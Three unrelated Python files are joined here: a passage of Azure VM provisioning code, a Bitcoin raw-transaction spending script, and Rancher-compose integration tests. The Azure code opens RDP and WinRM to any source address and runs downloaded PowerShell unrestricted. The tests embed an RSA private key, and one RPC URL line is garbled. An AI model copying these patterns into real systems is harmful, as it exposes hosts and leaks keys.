security group for the instance.
"""
log.info('Creating/updating resource group: {} with location: {}'.format(self.group_name,
self.location))
self.resource_client.resource_groups.create_or_update(self.group_name,
{'location': self.location})
if self.instancetype == 'Standard_NC6':
sku = 'standard_lrs'
else:
sku = 'premium_lrs'
storage_op = self.storage_client.storage_accounts.create(self.group_name,
self.storage_account,
{'sku': {'name': sku},
'kind': 'storage',
'location': self.location})
storage_op.wait()
create_vmnet = self.network_client.virtual_networks.create_or_update(
self.group_name, self.vmnet_name,
{'location': self.location,
'address_space': {'address_prefixes': ['10.10.0.0/16']}})
create_vmnet.wait()
create_subnet = self.network_client.subnets.create_or_update(
self.group_name, self.vmnet_name, self.subnet_name,
{'address_prefix': '10.10.10.0/24'})
self.subnet = create_subnet.result()
def create_vm(self, config_file=None, dns_suffix=None):
"""
Create an Azure VM instance.
:return: VirtualMachine object
or
:return: user, pass, VirtualMachine object in case of windows machine
"""
config = None
if config_file:
log.info('Assuming Windows Vm creation')
log.info('Looking up Windows VM credentials in {}\*.windows.'.format(config_file))
vm_file = [os.path.join(config_file, c) for c in os.listdir(config_file)
if c.endswith('.windows')][0]
# read credentials from file - should be present in the localpath provided to runner
config = ConfigParser.ConfigParser()
config.read(vm_file)
if 'Image' not in config.sections():
imageid = {'publisher': 'MicrosoftWindowsServer',
'offer': 'WindowsServer',
'sku': '2016-Datacenter',
'version': 'latest'}
else:
private_image = self.compute_client.images.get(
config.get('Image', 'resource_group'), config.get('Image', 'name'))
imageid = {'id': private_image.id}
vm_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))
nic = self.create_nic(vm_name, nsg=True)
vm_parameters = {
'location': self.location,
'os_profile': {
'computer_name': vm_name,
'admin_username': config.get('Windows', 'user'),
'admin_password': config.get('Windows', 'password'),
'windows_configuration': {'provision_vm_agent': True,
'enable_automatic_updates': False}
},
'hardware_profile': {'vm_size': self.instancetype},
'storage_profile': {
'image_reference': imageid,
'os_disk': {
'os_type': 'Windows',
'name': self.os_disk_name,
'caching': 'ReadWrite',
'create_option': 'fromImage'}},
'network_profile': {'network_interfaces': [{'id': nic.id}]}
}
else:
vm_name = self.imageid['offer'].lower() + str(time.time()).replace('.', '')
nic = self.create_nic(vm_name)
with open(os.path.join(self.localpath, self.key_name + '.pub'), 'r') as f:
key_data = f.read()
vm_parameters = {
'location': self.location,
'os_profile': {
'computer_name': vm_name,
'admin_username': self.user,
'linux_configuration': {
'disable_password_authentication': True,
'ssh': {
'public_keys': [{
'path': '/home/{}/.ssh/authorized_keys'.format(self.user),
'key_data': key_data}]}}},
'hardware_profile': {'vm_size': self.instancetype},
'storage_profile': {
'image_reference': self.imageid,
'os_disk': {
'name': self.os_disk_name,
'caching': 'None',
'create_option': 'fromImage',
'vhd': {'uri': 'https://{}.blob.core.windows.net/vhds/{}.vhd'.format(
self.storage_account, self.vmnet_name + str(time.time()))}}},
'network_profile': {'network_interfaces': [{'id': nic.id}]}
}
vm_creation = self.compute_client.virtual_machines.create_or_update(
self.group_name, vm_name, vm_parameters)
vm_creation.wait()
vm_instance = self.compute_client.virtual_machines.get(self.group_name, vm_name)
log.info('Created VM: {}'.format(vm_name))
vm_start = self.compute_client.virtual_machines.start(self.group_name, vm_name)
vm_start.wait()
log.info('Started VM: {}'.format(vm_name))
self.vms.append(vm_instance)
if config_file:
ext = self.compute_client.virtual_machine_extensions.create_or_update(
self.group_name, vm_name, 'custom_extension_script',
{'location': self.location,
'publisher': 'Microsoft.Compute',
'virtual_machine_extension_type': 'CustomScriptExtension',
'type_handler_version': '1.7',
'auto_upgrade_minor_version': True,
'settings': {
'fileUris': ['https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/ConfigureWinRM.ps1',
'https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/makecert.exe',
'https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/winrmconf.cmd'],
'commandToExecute': 'powershell -ExecutionPolicy Unrestricted -file ConfigureWinRM.ps1 {vm}'.format(vm='*'+dns_suffix)}
})
log.info('Ran custom script on VM: {}'.format(ext.result()))
return config.get('Windows', 'user'), config.get('Windows', 'password'), vm_instance
else:
return vm_instance
def create_nic(self, vm_name, nsg=None):
"""
Create an VM Network interface.
:param vm_name VM name
:param nsg <dict> containing security rules {}
:return: NetworkInterface ClientRawResponse
"""
create_public_ip = self.network_client.public_ip_addresses.create_or_update(
self.group_name, vm_name + '-ip',
{'location': self.location,
'public_ip_allocation_method': 'Dynamic',
'public_ip_address_version': 'IPv4',
'dns_settings': {
'domain_name_label': vm_name}})
public_ip = create_public_ip.result()
nic_parameters = {'location': self.location,
'ip_configurations': [{'name': self.ip_config_name,
'subnet': {'id': self.subnet.id},
'public_ip_address': {'id': public_ip.id}}]
}
if self.sriov == constants.ENABLED:
log.info('Adding Accelerated Networking')
nic_parameters['enable_accelerated_networking'] = True
if nsg:
create_nsg = self.network_client.network_security_groups.create_or_update(
self.group_name, vm_name + '-nsg',
{'location': self.location})
self.network_client.security_rules.create_or_update(
self.group_name, create_nsg.result().name, 'default-allow-rdp',
{'protocol': 'Tcp',
'source_address_prefix': '*',
'destination_address_prefix': '*',
'access': 'Allow',
'direction': 'Inbound',
'source_port_range': '*',
'destination_port_range': '3389',
'priority': 1000})
self.network_client.security_rules.create_or_update(
self.group_name, create_nsg.result().name, 'wsman-https',
{'protocol': 'Tcp',
'source_address_prefix': '*',
'destination_address_prefix': '*',
'access': 'Allow',
'direction': 'Inbound',
'source_port_range': '*',
'destination_port_range': '5986',
'priority': 1001})
log.info('Adding custom security group to NIC')
nic_parameters['network_security_group'] = create_nsg.result()
nic_name = self.nic_name + str(time.time())
nic_op = self.network_client.network_interfaces.create_or_update(
self.group_name, nic_name, nic_parameters)
log.info('Created NIC: {}'.format(nic_name))
return nic_op.result()
def attach_disk(self, vm_instance, disk_size=0, device=0):
"""
Creates and attached a disk to VM.
:param vm_instance: VirtualMachine obj to attach the disk to
:param disk_size: disk size in GB
:param device: disk lun device
:return disk_name: given disk name
"""
disk_name = vm_instance.name + '_disk_' + str(time.time())
disk_profile = {'name': disk_name,
'disk_size_gb': disk_size,
'caching': 'None',
'lun': device,
'vhd': {'uri': "http://{}.blob.core.windows.net/vhds/{}.vhd".format(
self.storage_account, disk_name)},
'create_option': 'Empty'}
vm_instance.storage_profile.data_disks.append(disk_profile)
vm_update = self.compute_client.virtual_machines.create_or_update(self.group_name,
vm_instance.name,
vm_instance)
vm_update.wait()
try:
vm_update.result()
log.info('Created disk: {}'.format(disk_name))
except Exception as de:
log.info(de)
return disk_name
def restart_vm(self, vm_name):
"""
Restart instances VM.
"""
vm_instance = self.compute_client.virtual_machines.get(self.group_name, vm_name)
log.info('Restarting VM: {}'.format(vm_name))
vm_restart = self.compute_client.virtual_machines.restart(self.group_name, vm_name)
vm_restart.wait()
time.sleep(120)
return vm_instance
def teardown(self):
"""
Cleanup created instances and devices.
"""
log.info("Running teardown.")
# Delete Resource group and everything in it
delete_resource_group = self.resource_client.resource_groups.delete(self.group_name)
try:
delete_resource_group.wait()
except CloudError as ce:
log.info(ce)
if 'AuthorizationFailed' in ce:
log.info("Resource group {} already removed".format(self.group_name))
log.info("Deleted: {}".format(self.group_name))
|
|
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 20460 if testnet else 10460
connect = "http://%s:%[email protected]:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of bitcoin.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
bitcoind = connect_JSON(config)
if options.amount is None:
address_summary = list_available(bitcoind)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(bitcoind) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(bitcoind, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(bitcoind, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = bitcoind.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
|
|
from common_fixtures import * # NOQA
import subprocess
from subprocess import Popen
from os import path
import os
import sys
import pytest
import cattle
import ConfigParser
PROJECTS = []
CERT = '''-----BEGIN CERTIFICATE-----
MIIDJjCCAg4CCQDLCSjwGXM72TANBgkqhkiG9w0BAQUFADBVMQswCQYDVQQGEwJB
VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0
cyBQdHkgTHRkMQ4wDAYDVQQDEwVhbGVuYTAeFw0xNTA3MjMwMzUzMDdaFw0xNjA3
MjIwMzUzMDdaMFUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEw
HwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxDjAMBgNVBAMTBWFsZW5h
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxdVIDGlAySQmighbfNqb
TtqetENPXjNNq1JasIjGGZdOsmFvNciroNBgCps/HPJphICQwtHpNeKv4+ZuL0Yg
1FECgW7oo6DOET74swUywtq/2IOeik+i+7skmpu1o9uNC+Fo+twpgHnGAaGk8IFm
fP5gDgthrWBWlEPTPY1tmPjI2Hepu2hJ28SzdXi1CpjfFYOiWL8cUlvFBdyNqzqT
uo6M2QCgSX3E1kXLnipRT6jUh0HokhFK4htAQ3hTBmzcxRkgTVZ/D0hA5lAocMKX
EVP1Tlw0y1ext2ppS1NR9Sg46GP4+ATgT1m3ae7rWjQGuBEB6DyDgyxdEAvmAEH4
LQIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA45V0bnGPhIIkb54Gzjt9jyPJxPVTW
mwTCP+0jtfLxAor5tFuCERVs8+cLw1wASfu4vH/yHJ/N/CW92yYmtqoGLuTsywJt
u1+amECJaLyq0pZ5EjHqLjeys9yW728IifDxbQDX0cj7bBjYYzzUXp0DB/dtWb/U
KdBmT1zYeKWmSxkXDFFSpL/SGKoqx3YLTdcIbgNHwKNMfTgD+wTZ/fvk0CLxye4P
n/1ZWdSeZPAgjkha5MTUw3o1hjo/0H0ekI4erZFrZnG2N3lDaqDPR8djR+x7Gv6E
vloANkUoc1pvzvxKoz2HIHUKf+xFT50xppx6wsQZ01pNMSNF0qgc1vvH
-----END CERTIFICATE-----
'''
KEY = '''-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxdVIDGlAySQmighbfNqbTtqetENPXjNNq1JasIjGGZdOsmFv
NciroNBgCps/HPJphICQwtHpNeKv4+ZuL0Yg1FECgW7oo6DOET74swUywtq/2IOe
ik+i+7skmpu1o9uNC+Fo+twpgHnGAaGk8IFmfP5gDgthrWBWlEPTPY1tmPjI2Hep
u2hJ28SzdXi1CpjfFYOiWL8cUlvFBdyNqzqTuo6M2QCgSX3E1kXLnipRT6jUh0Ho
khFK4htAQ3hTBmzcxRkgTVZ/D0hA5lAocMKXEVP1Tlw0y1ext2ppS1NR9Sg46GP4
+ATgT1m3ae7rWjQGuBEB6DyDgyxdEAvmAEH4LQIDAQABAoIBAEKeWL29L9DL+KJg
wBYiM0xxeCHxzKdHFW+Msvdhh3wUpK6S+vUclxb3NHA96RnhU8EH3jeMokDADkTr
Us1eiy2T/gkCBRscymeqUetO49IUAahyYg/nU1X7pg7eQmNkSnHmvQhE3UDjQNdJ
zJYkrROIQWZZVNIib+VLlbXTi0WIYcoukS+Jy2lfABLZbYVFMOEOv5IfRvXTjcgc
jiHUbamYM9ADR/mtupFTShyVV2UBoI8cuWSPJnWNHZ39TN61owNoVycxfagBlheO
Jb07cY0DSSx9968RYRzX9YGMUCpnoleWG5Qg29ySaLDJWqpEkNXdeJlJ+0RzErFr
TrnlXMECgYEA6OTUpfRHu8m1yhqF9HK0+aiOPVLBOkFc55Ja/dBaSApaYtcU5ZYe
IlCgGRM1+3G3bzwrwunbAdGVKdd+SiXLY5+p08HW0sFSgebdkRtcTmbq1Gvns+Fx
ZUX9QBxZq7jiQjHde68y1kpSqJfjeHktZ1voueZ0JUZwx9c7YDC/+V0CgYEA2XX1
W9f7b4Om740opDwgSLIEgIpBqSrSoJQQNzcOAWbY2CTY5xUqM9WbitlgbJ9Bo0Zo
jyHmsp3CLGz8onv7wlR67WJSqriedIBJLQD2DnmQpb3j61rNLruhcxTC5phtBheN
0ZQrO0SmfCjevLefc3jmB0Uu9qfvkoZoJPXAfRECgYEAvxbK+CPYG9fkhiB/GtRn
c5V+qAhXrUHmRceLS0iCWyvLf9/0MHCc5xD6W7isiVSD6wwW6AXTgcmCN2OuJo6e
NG7T/IDGkAS5ewZ/c8lcUqQVOBgVdD2dOjhUFB9u3/yCAUhC73IQJ02yRszhgn8C
5xS9fpL9Z3xFm2MZP9KgIa0CgYBksg1ygPmp8pF7fabjHgBpCR2yk9LBzdWIi+dS
Wgj/NyuUMsPJhXBsXi5PRkczJS+Utoa2OKGF9i0yuyjk6Hp0yv+9KnlTGngtRDYe
Q8Ksgzgqt1px4jL+v92L14JEmzJozsFZ2b2HDUv2VEqHopOQOdxyY2PSzYLPG7Pf
4XhHsQKBgEfRPtokHpt+dJ6RhdUTEQAoT2jDVGhZLaYbtGh5Jtf2F5mhQR3UlvVi
FH/0iMK8IRo8XhFw0lrmZvY0rC0ycFGewvdW5oSvZvStATObGRMHUYNdbMEAMu86
dkOGpBSMzSXoZ2d0rKcetwRWZqUadDJnakNfZkjIY64sbd5Vo4ev
-----END RSA PRIVATE KEY-----
'''
class Compose(object):
def __init__(self, client, compose_bin):
self.compose_bin = compose_bin
self.client = client
def check_retcode(self, input, check_retcode, *args, **kw):
p = self.call(*args, **kw)
output = p.communicate(input=input)
retcode = p.wait()
assert check_retcode == retcode
return output
def check_call(self, input, *args):
p = self.call(*args)
output = p.communicate(input=input)
retcode = p.wait()
assert 0 == retcode
return output
def call(self, *args, **kw):
env = {
'RANCHER_CLIENT_DEBUG': 'true',
'RANCHER_ACCESS_KEY': self.client._access_key,
'RANCHER_SECRET_KEY': self.client._secret_key,
'RANCHER_URL': self.client._url,
}
cmd = [self.compose_bin]
cmd.extend(args)
kw_args = {
'env': env,
'stdin': subprocess.PIPE,
'stdout': sys.stdout,
'stderr': sys.stderr,
'cwd': _base(),
}
kw_args.update(kw)
return Popen(cmd, **kw_args)
@pytest.fixture(scope='session')
def client(admin_user_client, request):
try:
return cattle.from_env(url=os.environ['RANCHER_URL'],
access_key=os.environ['RANCHER_ACCESS_KEY'],
secret_key=os.environ['RANCHER_SECRET_KEY'])
except KeyError:
pass
try:
config = ConfigParser.ConfigParser()
config.read(path.join(_base(), '../../tox.ini'))
return cattle.from_env(url=config.get('rancher', 'url'),
access_key=config.get('rancher', 'access-key'),
secret_key=config.get('rancher', 'secret-key'))
except ConfigParser.NoOptionError:
pass
return new_context(admin_user_client, request).client
def _file(f):
return path.join(_base(), '../../../../{}'.format(f))
def _base():
return path.dirname(__file__)
@pytest.fixture(scope='session')
def compose_bin():
c = _file('bin/rancher-compose')
assert path.exists(c)
return c
def _clean_all(client):
for p in PROJECTS:
client.delete(p)
@pytest.fixture(scope='session')
def compose(client, compose_bin, request):
return new_compose(client, compose_bin, request)
def new_compose(client, compose_bin, request):
request.addfinalizer(lambda: _clean_all(client))
return Compose(client, compose_bin)
def create_project(compose, operation='create', project_name=None, file=None,
input=None):
if project_name is None:
project_name = random_str()
if file is not None:
compose.check_call(None, '--verbose', '-f', file, '-p', project_name,
operation)
elif input is not None:
compose.check_call(input, '--verbose', '-f', '-', '-p', project_name,
operation)
PROJECTS.append(project_name)
return project_name
@pytest.mark.skipif('True')
def test_build(client, compose):
project_name = create_project(compose, file='assets/build/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'fromfile'
assert service.launchConfig.build.dockerfile == 'subdir/Dockerfile'
assert service.launchConfig.build.remote is None
assert service.launchConfig.build.context.startswith('https://')
def test_args(client, compose):
project_name = create_project(compose, file='assets/full-with-build.yml')
project_with_build = find_one(client.list_environment, name=project_name)
service = find_one(project_with_build.services)
assert service.launchConfig.build == {
'dockerfile': 'something/other',
'remote': 'github.com/ibuildthecloud/tiny-build',
}
project_name = create_project(compose, file='assets/full-with-image.yml')
project_with_image = find_one(client.list_environment, name=project_name)
service = find_one(project_with_image.services)
assert service.launchConfig.imageUuid == 'docker:nginx'
for project in (project_with_build, project_with_image):
service = find_one(project.services)
assert service.name == 'web'
launch_config = service.launchConfig
assert launch_config.command == ['/bin/sh', '-c']
assert len(launch_config.ports) == 2
for p in launch_config.ports:
assert p == '80:81/tcp' or p.endswith(':123/tcp')
assert launch_config.dataVolumes == ['/tmp/foo', '/tmp/x:/tmp/y']
assert launch_config.environment == {'foo': 'bar', 'a': 'b'}
assert launch_config.dns == ['8.8.8.8', '1.1.1.1']
assert launch_config.capAdd == ['ALL', 'SYS_ADMIN']
assert launch_config.capDrop == ['NET_ADMIN', 'SYS_ADMIN']
assert launch_config.dnsSearch == ['foo.com', 'bar.com']
assert launch_config.entryPoint == ['/bin/foo', 'bar']
assert launch_config.workingDir == '/somewhere'
assert launch_config.user == 'somebody'
assert launch_config.hostname == 'myhostname'
assert launch_config.domainName == 'example.com'
assert launch_config.memory == 100
assert launch_config.memorySwap == 101
assert launch_config.privileged
assert launch_config.stdinOpen
assert launch_config.tty
assert 'name' not in launch_config
assert launch_config.cpuShares == 42
assert launch_config.cpuSet == '1,2'
assert launch_config.devices == ['/dev/sda:/dev/a:rwm',
'/dev/sdb:/dev/c:ro']
s = 'io.rancher.service.selector.'
assert launch_config.labels['io.rancher.service.hash'] is not None
del launch_config.labels['io.rancher.service.hash']
assert launch_config.labels == {'a': 'b',
s + 'link': 'bar in (a,b)',
s + 'container': 'foo',
'c': 'd'}
assert service.selectorLink == 'bar in (a,b)'
assert service.selectorContainer == 'foo'
assert launch_config.securityOpt == ['label:foo', 'label:bar']
assert launch_config.pidMode == 'host'
assert launch_config.logConfig == {
'driver': 'syslog',
'config': {
'tag': 'foo',
}
}
assert launch_config.extraHosts == ['host:1.1.1.1', 'host:2.2.2.2']
assert launch_config.networkMode == 'host'
assert launch_config.volumeDriver == 'foo'
# Not supported
# assert launch_config.externalLinks == ['foo', 'bar']
def test_git_build(client, compose):
template = '''
nginx:
build: github.com/ibuildthecloud/tiny-build
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.build == {
'remote': 'github.com/ibuildthecloud/tiny-build',
}
assert service.launchConfig.imageUuid is not None
prefix = 'docker:{}_nginx_'.format(project_name)
assert service.launchConfig.imageUuid.startswith(prefix)
def test_circular_sidekick(client, compose):
template = '''
primary:
stdin_open: true
image: busybox
command: cat
labels:
io.rancher.sidekicks: secondary
volumes_from:
- secondary
secondary:
stdin_open: true
image: busybox
command: cat
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.dataVolumesFromLaunchConfigs == ['secondary']
secondary = filter(lambda x: x.name == 'secondary',
service.secondaryLaunchConfigs)
assert len(secondary) == 1
def test_delete(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.state == 'inactive'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
service = client.wait_success(service)
assert service.state == 'active'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'rm', '--force')
service = client.wait_success(service)
assert service.state == 'removed'
def test_delete_while_stopped(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.state == 'inactive'
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'rm', 'web')
service = client.wait_success(service)
assert service.state == 'removed'
def test_network_bridge(client, compose):
template = '''
web:
net: bridge
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'bridge'
def test_network_none(client, compose):
template = '''
web:
net: none
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'none'
def test_network_container(compose, client):
template = '''
foo:
labels:
io.rancher.sidekicks: web
image: nginx
web:
net: container:foo
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
assert service.secondaryLaunchConfigs[0].networkMode == 'container'
assert service.secondaryLaunchConfigs[0].networkLaunchConfig == 'foo'
def test_network_managed(client, compose):
template = '''
web:
net: managed
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
def test_network_default(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.networkMode == 'managed'
def test_env_file(client, compose):
project_name = create_project(compose, file='assets/base.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
second = _get_service(project.services(), 'base')
assert second.launchConfig.environment == {
'bar': 'baz',
'd': 'e',
'env': '2',
'foo': 'bar',
'a': 'b',
}
def test_extends(client, compose):
project_name = create_project(compose, file='assets/base.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
base = _get_service(project.services(), 'base')
local = _get_service(project.services(), 'local')
other_base = _get_service(project.services(), 'other-base')
assert base.launchConfig.imageUuid == 'docker:second'
assert local.launchConfig.imageUuid == 'docker:local'
assert local.launchConfig.ports == ['80:80/tcp']
assert local.launchConfig.environment == {'key': 'value'}
assert other_base.launchConfig.ports == ['80:80/tcp', '81:81/tcp']
assert other_base.launchConfig.imageUuid == 'docker:other'
assert other_base.launchConfig.environment == {'key': 'value',
'key2': 'value2'}
def test_extends_1556(client, compose):
project_name = create_project(compose,
file='assets/extends/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert project.name == project_name
web = _get_service(project.services(), 'web')
db = _get_service(project.services(), 'db')
assert web.launchConfig.imageUuid == 'docker:ubuntu:14.04'
assert db.launchConfig.imageUuid == 'docker:ubuntu:14.04'
web = find_one(db.consumedservices)
assert web.name == 'web'
def test_extends_1556_2(compose):
with pytest.raises(AssertionError):
create_project(compose, file='assets/extends_2/docker-compose.yml')
def test_lb_private(client, compose):
template = '''
lb:
expose:
- 111:222
- 222:333/tcp
image: rancher/load-balancer-service
ports:
- 80
links:
- web
- web2
web:
image: nginx
web2:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
lb = _get_service(project.services(), 'lb')
assert lb.launchConfig.expose == ['111:222', '222:333/tcp']
def test_lb_basic(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80:80
links:
- web
- web2
web:
image: nginx
web2:
image: nginx'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
lb = _get_service(project.services(), 'lb')
